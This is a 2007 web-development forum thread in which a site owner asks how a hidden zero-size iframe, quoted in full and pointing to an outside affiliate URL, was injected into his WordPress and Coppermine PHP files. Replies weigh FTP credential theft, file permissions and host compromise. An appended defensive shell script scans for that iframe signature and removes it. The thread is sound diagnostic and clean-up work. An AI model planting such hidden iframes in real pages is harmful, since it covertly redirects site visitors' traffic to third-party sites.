How do you prevent this?
Posted: Fri Aug 31, 2007 4:10 pm
by Billy2007
feyd | Please use [code] and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read: Posting Code in the Forums (http://forums.devnetwork.net/viewtopic.php?t=21171) to learn how to do it too.
There's an exploit out there and if your site gets hacked chances are you won't even know it.
The hack inserts code into php and html files. In my case two apps were hacked on my site yesterday - one was the WordPress Blog, the other was a php image gallery, Coppermine.
What code was inserted?:
[syntax="html"]<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>[/syntax]
The fix?
Very simple. Get yourself a nice search and replace utility that does batch replaces and replace the code leaving the replace field blank. Or write a script to do it on the server.
The problem? They'll be back.
So can any experts out there (I'm just a photographer) shed some light on how a client sider like me can secure his shared server (Apache) from these cybertrash kiddies and their sick bots?
Any suggestions would be greatly appreciated. I run many PHP applications, including PixelPost and phpBB, but only Coppermine and WordPress were infected. It seems that the CMS community is very hush-hush on these exploits (bad publicity for them) and, as I said before, most users (probably thousands of them) don't know the code is there unless it breaks an application by busting up the code.
Thanks in advance.
Edit: I should have added that the code doesn't try to break the site; it just redirects traffic in the background to generate ad revenue, I guess. If you watch the status bar you will see all kinds of transfers going on while the page loads. In some cases it does break it unwittingly; for example it caused IE to read my CSS wrong and send my WP sidebar to the bottom. That was the tipoff for me.
Forum Rules (http://forums.devnetwork.net/viewtopic.php?t=30037) Section 1.1 wrote:
2. Use descriptive subjects when you start a new thread. Vague titles such as "Help!", "Why?" are misleading and keep you from receiving an answer to your question.
Posted: Sat Sep 01, 2007 4:54 am
by Kieran Huggins
There's no magic security bullet code out there. Each instance is an example of a different security hole being found and exploited in each package. The authors of those apps do release security and bug fixes regularly to fix these vulnerabilities.
Your best defense is to try and keep your app installs up-to-date at all times. Many "one click install" hosts have a "one click upgrade" button that makes it dead simple to stay up-to-date with the latest security releases. It's sometimes a bit of a pain to do manually, but it's a chore that needs to be done nonetheless.
Re: How do you prevent this?
Posted: Sat Sep 01, 2007 6:41 am
by superdezign
Re: How do you prevent code insertion attack?
Posted: Sat Sep 01, 2007 10:42 am
by Billy2007
superdezign wrote:
Inserted where?
The code was inserted somewhere in the body of index.php in WordPress. In the case of Coppermine, the code was inserted (often multiple times) at the top of most (if not all) of the php files that are in the include folder.
Updating is part of the solution. I do that and, most importantly, all my files and the MySQL tables are religiously backed up weekly.
My question is how does this happen, so I can customize my open-source PHP to minimize it happening again. Customized code is very unlikely to be hacked; mainstream code is very likely to be hacked.
If anyone has the expertise of a hacker, i.e. understands how the attack happens (where is the point of entry, is it related to the server configuration (global settings), is it related to the login, etc.), that's where it would be helpful, and hopefully this prevention information could be spread to other CMS communities.
Fact: the average PHP-based CMS user (forums, Mambo, Joomla, WordPress, etc.) is not a techie. These people create content, not code. It's a shame to see a site defaced or trashed when it could have been stopped with some simple-to-implement measures.
I don't know how this attack works, and unless I can find an expert to explain it to me, I won't be in any position to stop one in the future, upgrades or not. BTW, upgrades are a complex process because plugins and customizations rarely work afterwards.
So again, any help from the experts in this community would be greatly appreciated.
Thanks
P.S. sorry for the vague subject and not using the code tags...
Re: How do you prevent code insertion attack?
Posted: Sat Sep 01, 2007 11:22 am
by superdezign
Billy2007 wrote:My question is how does this happen so I can customize my opensource php to minimize it happening again.
It was actually IN the files? That doesn't sound like a client-side hack. Most likely, someone actually gained access to your server via FTP. Maybe you should consider a more secure password.
Billy2007 wrote:Customized code is very unlikely to be hacked, mainstream code is very likely to be hacked.
I don't agree with that statement at all. Mainstream just means more people actually know what the code looks like. That doesn't make the code less secure.
Re: How do you prevent code insertion attack?
Posted: Sat Sep 01, 2007 1:27 pm
by Billy2007
superdezign wrote:It was actually IN the files? That doesn't sound like a client-side hack. Most likely, someone actually gained access to your server via FTP. Maybe you should consider a more secure password.
Client side? No, never came into question. This is server side, like SQL injection. The fact that the same line of code was repeated several times, and the fact that only certain apps were compromised, all point to a bot attack. (I also checked the access logs on the server; nobody hacked the passwords.)
superdezign wrote:I don't agree with that statement at all. Mainstream just means more people actually know what the code looks like. That doesn't make the code less secure.
Agreed. What I meant is that bots look for code they can recognize. This is why CAPTCHA with questions works; bots are too stupid to answer simple questions unless they know what questions will be asked. Simply removing a website URL field on a comment form can end a spammer's attempt to spam your site; changing the order or names of fields on a registration form will once more send a bot into fits. That's what I meant.
Obviously, if we are talking humans, well, that's another story, but to think some hacker actually looked for my tiny little site out of the billions of sites out there, just to insert a few lines of code that would help him generate some ad revenue before being reported and shut down, doesn't make sense.
So my initial question remains: by what mechanism was the hack perpetrated? Knowing that will help prevent it.
Edit: when I said I'm a client sider, I meant I photograph, I Photoshop, I write Flash ActionScript, I write JavaScript, as well as CSS etc. In other words, I can develop my own website. I also access my site through FTP and its control panel, the basics of Unix etc., but I'm not a security expert on PHP nor on servers. That's why I'm asking for help in this community. None of my HTML or Flash components were touched, only the PHP ones.
Posted: Sat Sep 01, 2007 1:43 pm
by califdon
I'm certainly not a security expert either, but I totally agree with Superdezign that what you described sounds like it had to be done on the server side by someone who gained access to your hosting password. I know of no exploit from a client program that could change code in your scripts. That's what he meant by client-side.
Posted: Sat Sep 01, 2007 3:04 pm
by Billy2007
califdon wrote:I'm certainly not a security expert either, but I totally agree with Superdezign that what you described sounds like it had to be done on the server side by someone who gained access to your hosting password. I know of no exploit from a client program that could change code in your scripts. That's what he meant by client-side.
Then the person who hacked my account must have been severely mentally retarded. Why? Because aside from the fact that no real damage was done to my site, the same line of code was inserted repeatedly. A bot will do that but a human realizes when he has inserted it once versus a dozen times in the same file....other files infected aren't even used by my site....they just happened to be in the same folder.....files in image folders were infected although they aren't even executed...only a bot could make that "mistake".
Also, doing a Google search on "free20.com hack" will reveal a handful of people who have reported this. There is no relationship between myself and these people; we all got hacked by bots. In fact these bots were likely unleashed in the past, because the website of the hacker has been closed down. Again, he would have to be incredibly stupid to add code to generate ad revenue for his website when his site is no longer up.
Surely a bot must have infected thousands of users, not just me, so why so few reports on the web? Because the hack doesn't do much damage, if any. You will only notice you are infected if you look at the status bar on your browser; there you will see transfers from ad sites as the page loads, so people don't even know they are infected.
Regarding your point about client or server, again, yes, it is server side. And yes, these attacks happen all the time: spam bots, SQL injection, etc. Even Microsoft's site has been defaced by bots.
Final point: I use strong passwords. My site is not even advertised; it is just for family and friends. This wasn't the work of Kevin Mitnick.
Posted: Sun Sep 02, 2007 1:55 am
by s.dot
Are your files writable by everyone? 0777?
Posted: Sun Sep 02, 2007 9:33 am
by Billy2007
Hey Scott
The index.php file from the WordPress blog had one line of code (the iframe) inserted - it is the only line of code that actually worked (i.e. that redirected to ad sites).
The properties are set to only allow the owner to write: 644
The compromised files in the Coppermine gallery include folder actually broke one of the files and did not allow the iframe hack to do its thing. Once more, these files are set to 644. These had the same line of code repeatedly inserted for some reason - as if the bot did not realize it had inserted the file and kept repeating.
None of the other components of the site (Flash, HTML) were compromised. Same for the other PHP components: PixelPost (3 photo galleries in different folders) and the phpBB forum were all clean.
Any insight into how this attack was carried out would be greatly appreciated - there is very little on the internet on this issue. People can only offer "someone must know your password" - which reminds me of the typical tech support response when your printer doesn't work - "must be a virus, reformat your hard drive and reinstall windows and all your applications".
Posted: Sun Sep 02, 2007 10:12 pm
by Z3RO21
Sounds to me like a bot exploiting poorly written code that is not properly validating data.
Posted: Mon Sep 03, 2007 5:14 am
by VladSun
Have you emailed your hosting support about this? Maybe it would come out that you are not the only one with this problem
Posted: Mon Sep 03, 2007 12:49 pm
by Billy2007
Z3RO21 wrote:Sounds to me like a bot exploiting poorly written code that is not properly validating data.
Agreed. I have updated both php apps - but I still want to understand where the door was, so I can shut it down.
Posted: Mon Sep 03, 2007 12:50 pm
by Billy2007
VladSun wrote:Have you emailed your hosting support about this? Maybe it would come out that you are not the only one with this problem
I spoke to them on the phone as well. They were totally useless; their attitude was "it's not our problem, it's your problem."
Posted: Mon Sep 03, 2007 1:05 pm
by VladSun
Billy2007 wrote:Z3RO21 wrote:Sounds to me like a bot exploiting poorly written code that is not properly validating data.
Agreed. I have updated both php apps - but I still want to understand where the door was, so I can shut it down.
Most probably it is not the case. Usually, only your FTP user has write access to your files, unless they are chmoded to 0777 permissions. That's why a poor coding problem wouldn't result in file modifications. You said that your modified files had 0644 permissions, so it should have been done by your FTP user or by another user with write access (e.g. root).
So, there are two ways it could be done:
1) somebody has access to your FTP user/password (e.g. by using a trojan on your PC);
2) your hosting server has been totally hacked.
I would vote for the second one.
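A defender-side script for the two practical points raised in the thread: Billy2007's "write a script to do it on the server" clean-up, and VladSun's point that the mode and owner of the rewritten 644 files say who could have written them. This is an added example, not code from any poster; the signature strings and the demo tree are constructed, and ads.example.invalid stands in for the ad site.

```shell
#!/bin/sh
# Added example, not code from the thread: find the hidden zero-size iframe
# the posts describe under a web root, report each hit with the mode, owner
# and mtime clues the replies asked about, and strip it after a backup.
# Start of the injected fragment quoted in the thread; the ad URL is not
# hard-coded. PAT removes the whole <html><iframe ...></iframe></html>.
SIG='<html><iframe width=0 height=0 frameborder=0 src='
PAT='<html><iframe width=0 height=0 frameborder=0 src=[^>]*></iframe></html>'
# Constructed sample of the fragment (example.invalid is not a real site).
SAMPLE="<html><iframe width=0 height=0 frameborder=0 src=http://ads.example.invalid/?aff=demo scrolling=no></iframe></html>"

# List every .php/.html file under $1 that contains the fragment.
find_infected() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' \) \
        -exec grep -l -F -- "$SIG" {} + 2>/dev/null || true
}

# Count copies in $1; the thread saw the same line inserted many times.
count_copies() {
    awk -v s="$SIG" '{ while ((i = index($0, s)) > 0) { n++; $0 = substr($0, i + length(s)) } }
        END { print n + 0 }' "$1"
}

# One line per hit: a 644 file rewritten by a non-owner points at the account or host.
report_infected() {
    find_infected "$1" | while IFS= read -r f; do
        st=$(stat -c '%a %U %y' "$f" 2>/dev/null || stat -f '%Lp %Su %Sm' "$f")
        printf '%s copies=%s mode/owner/mtime=%s\n' "$f" "$(count_copies "$f")" "$st"
    done
}

# Remove every copy from $1, keeping $1.bak; writing through the existing
# file preserves its mode and owner.
clean_file() {
    cp -p -- "$1" "$1.bak" && sed "s#$PAT##g" "$1.bak" > "$1"
}

# Constructed demo tree: two infected files, one clean file.
make_demo_tree() {
    d=$(mktemp -d) && mkdir -p "$d/wp" "$d/gallery/include"
    printf '<?php\n%s\n// legitimate code\n%s\n' "$SAMPLE" "$SAMPLE" > "$d/wp/index.php"
    printf '%s\n' "$SAMPLE" > "$d/gallery/include/init.html"
    printf '<?php\n// clean\n' > "$d/gallery/include/config.php"
    echo "$d"
}

if [ "${1:-}" = demo ]; then   # sh scan.sh demo
    root=$(make_demo_tree); report_infected "$root"
    find_infected "$root" | while IFS= read -r f; do clean_file "$f"; done
    echo "still infected: $(find_infected "$root" | wc -l)"; rm -rf "$root"
fi
```

Against a real site, call `report_infected /path/to/webroot` first and compare the mtimes and owners it prints with your own FTP sessions before cleaning anything.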